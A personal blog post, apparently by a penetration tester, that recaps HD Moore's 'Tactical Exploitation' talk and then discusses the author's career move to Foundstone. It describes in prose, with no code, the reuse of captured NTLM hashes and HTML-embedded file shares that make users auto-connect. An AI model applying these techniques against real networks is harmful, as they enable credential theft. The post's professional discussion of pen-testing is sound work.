cyberwart

At BH/Defcon HD Moore gave a great talk entitled “Tactical Exploitation”. They dragged the talk out a bit long, but mixed in there were several neat tricks and a more importantly a hacking philosophy that I couldn’t agree with more.

Tactical Exploitation is about being clever. It’s not exploit development, it’s taking existing technology and leveraging it to the attacker’s advantage. A good example is misusing the way NTLM/Netbios works. I’ve seen shops that build HUGE parallel clusters to crack NTLM passwords…. it works, but they never quite understood that you didn’t need to crack the hashes. Rather, you can simply grab them and re-use them. Yes, there are some reasons to crack them, but that’s beyond the scope here. Tactical Exploitation realizes that you only need the hash, and then builds it into an attack. For example, they use file shares embedded in html to cause users to auto connect.

Tactical exploitation is powerful because it’s so simple. Some customer’s hear “0-day” or “exploit development” and instantly you lose relevance. All but a few government and financial institutions care about this level of attack. They (sometimes rightly) regard that threat as beyond their capability and/or as a realistic threat given their business. Therefore tests can rapidly spiral into patch management audits — which prove very little. However, by leveraging misconfiguration, user error, and a few clever hacks you can typically gain access.

Tying these tactical attacks together, you can achieve strategic exploitation of the target and be assured of a successful PT.

Over a year ago I had a job offer from Foundstone. At the time I declined. There were several reasons for that. One of the larger was that the position was in NYC. I think NY is a wonderful city, but I just didn’t feel up to the move. Further, I felt a bit of reservation about Foundstone’s approach. Essentially, most of their pen test type work is very fast and formalized. I was interested in pursuing other approaches. So, I spent a year at a company that offered me that opportunity. When I had pen test work it was great. I could execute the tests mostly like I wanted. I could meet the customer’s need and do research type work too. Unfortunately the PT work didn’t come often enough.

I had considered several very well known shops in the DC area. Many of them follow a very similar mentality that I do. The problem is that they separate development from services — a pen tester generally won’t write code or exploits. To me, I just can’t fathom this. I’ve worked in this type environment and it just seems to me that the service people become too dependent on the developers and the tools…. at the same time the developers get too far away from hands-on the network.

All things considered, I’ve accepted a job with Foundstone (in the DC area). I think their unique mix of business, research, teaching, and writing should offer me the chance to grow in the ways that I want.